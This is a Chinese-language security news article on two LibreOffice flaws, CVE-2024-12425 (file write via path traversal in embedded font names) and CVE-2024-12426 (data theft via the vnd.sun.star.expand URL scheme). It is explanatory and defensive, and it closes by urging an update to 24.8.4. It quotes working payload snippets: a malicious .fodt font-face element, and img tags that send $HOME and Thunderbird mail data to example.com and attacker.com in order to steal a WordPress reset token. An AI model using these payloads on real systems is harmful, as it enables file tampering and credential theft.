Codean 实验室的研究人员在 LibreOffice 软件中发现了两个严重的安全漏洞：CVE-2024-12425（任意文件写入）和 CVE-2024-12426（远程文件读取）。攻击者只需诱使用户打开恶意文档，无需任何其他交互，便可利用这些漏洞在桌面和服务器环境中执行恶意操作。其中，CVE-2024-12425允许攻击者通过操纵字体族名称在系统任意位置写入文件；CVE-2024-12426则允许攻击者窃取敏感的系统信息，如环境变量、凭证和配置文件。研究人员已发布概念验证文件，并建议用户尽快更新到 LibreOffice 24.8.4 或更高版本以防范这些漏洞。

🚨 **任意文件写入漏洞 (CVE-2024-12425)**：攻击者可以构造恶意的.fodt 文件，利用 LibreOffice 处理字体的方式，在用户不知情的情况下，将任意文件写入到系统的任意位置，但文件扩展名必须为.ttf。

🔑 **远程信息泄露漏洞 (CVE-2024-12426)**：利用 LibreOffice 支持的 `vnd.sun.star.expand` URL 方案，攻击者可以构造包含恶意代码的文档，在用户打开时，静默地提取用户的环境变量、凭证以及配置文件等敏感信息，并发送到攻击者控制的服务器。

📧 **利用场景：窃取 WordPress 重置令牌**：攻击者可以先触发对受害者 WordPress 账户的密码重置请求，然后向受害者发送一个恶意的文档，该文档可以从受害者的 Thunderbird 电子邮件客户端中提取重置令牌，从而接管受害者的 WordPress 网站。

🛡️ **防御措施**：为防止受到这些漏洞的攻击，用户应立即将 LibreOffice 更新到 24.8.4 版本或更高版本。

Codean 实验室的网络安全研究人员在 LibreOffice 软件中发现了两个漏洞，这些漏洞可导致任意文件写入，以及从环境变量和配置文件中远程提取数据。这两个漏洞分别是 CVE-2024-12425（任意文件写入）和 CVE-2024-12426（远程文件读取），用户只需打开恶意文档，无需其他交互操作，就可能被利用，这使得它们在桌面环境和服务器环境中都极具可利用性。研究人员警告称：“这两个漏洞都是在加载文档时触发，无需用户进行任何交互操作。” 他们强调了对于个人用户以及在自动化服务器端工作流程中使用 LibreOffice 的组织而言，存在的风险。CVE-2024-12425 漏洞源于 LibreOffice 处理.fodt（扁平开放文档格式，Flat ODF）文档中嵌入字体的方式。在加载文档时，该应用程序会提取字体数据，并将其以.ttf 文件的形式存储在临时目录中。然而，由于输入验证不当，攻击者可以通过操纵字体族名称，突破指定目录的限制，从而在系统的任意位置写入文件。研究人员解释道：“因为在以任何方式验证字体之前就会执行这个过程，所以我们可以指定任意的 Base64 编码数据，并在文件系统的任意位置写入我们想要的内容。”一个精心构造的包含以下代码片段的.fodt 文件，可以将一个名为 pwned0.ttf 的任意文件写入受害者的主目录：<style:font-face style:name=”Foobar” svg:font-family=”../../../../../../../pwned” style:font-family-generic=”roman” style:font-pitch=”variable”><svg:font-face-src><svg:font-face-uri loext:font-style=”normal” loext:font-weight=”normal”><office:binary-data>SGVsbG8gd29ybGQgaW5zaWRlIGEgZm9udCBmaWxlIQ==</office:binary-data><svg:font-face-format svg:string=”opentype”/></svg:font-face-uri></svg:font-face-src></style:font-face>当这个恶意文件被打开时，攻击者就获得了对系统中任意路径的写入权限，唯一的限制是文件扩展名必须为.ttf。第二个漏洞 CVE-2024-12426，能让攻击者窃取敏感的系统信息，包括环境变量、凭证以及配置文件。LibreOffice 支持一种鲜为人知的 URL 方案 ——vnd.sun.star.expand，该方案可以展开来自 INI 文件和环境变量的变量。这使得攻击者能够构造一个文档，在打开时无声地泄露用户数据。研究人员警告称：“这个方案特别值得关注，因为它具有变量替换功能，让人联想到 Log4j 漏洞。”一个包含以下代码片段的恶意文档会提取受害者的主目录，并将其发送到攻击者控制的服务器：<img src=”vnd.sun.star.expand:https://example.com?foo=$HOME”&gt;这种技术不仅限于提取环境变量。LibreOffice 的 INI 解析器非常宽松，它甚至可以读取 TOML 和.env 配置文件，而这些文件通常包含 API 密钥、数据库凭证和机密令牌。研究人员警告称：“如果用户的 shell 历史文件中有包含‘=’的行，那么即使是在某个时候手动传递给不同进程的环境变量，也可能被提取出来。”一个现实世界中的利用场景是攻击者从受害者的电子邮箱收件箱中窃取 WordPress 重置令牌：1.攻击者触发对受害者 WordPress 账户的密码重置请求。2.他们向受害者发送一个恶意的.odt 或.doc 文件。3.受害者打开该文件，文件会从受害者的雷鸟（Thunderbird）电子邮件客户端中提取重置令牌。4.攻击者捕获该令牌，并接管受害者的 WordPress 网站。攻击载荷使用递归替换来提取雷鸟的电子邮件数据库：<img src=”vnd.sun.star.expand:https://attacker.com/?q=${file\://$HOME/.thunderbird/${file\://$HOME/.thunderbird/profiles.ini:Profile0:Path}/global-messages-db.sqlite:https\://victim-blog.com/wp-login.php?action}”&gt;这种攻击能够成功，是因为雷鸟以原始形式存储电子邮件内容，而 WordPress 的密码重置邮件以一种可预测的方式格式化令牌。研究人员警告称：“这当然是一个非常特殊的情况，但这样的有针对性的攻击很容易针对不同的电子邮件客户端（甚至可能是聊天应用程序）以及其他敏感的电子邮件内容进行调整。”Codean 实验室提供了概念验证（PoC）文件，以帮助管理员确定他们安装的 LibreOffice 是否存在漏洞。为防范这些漏洞，请将您的 LibreOffice 更新到 24.8.4 版本或更高版本。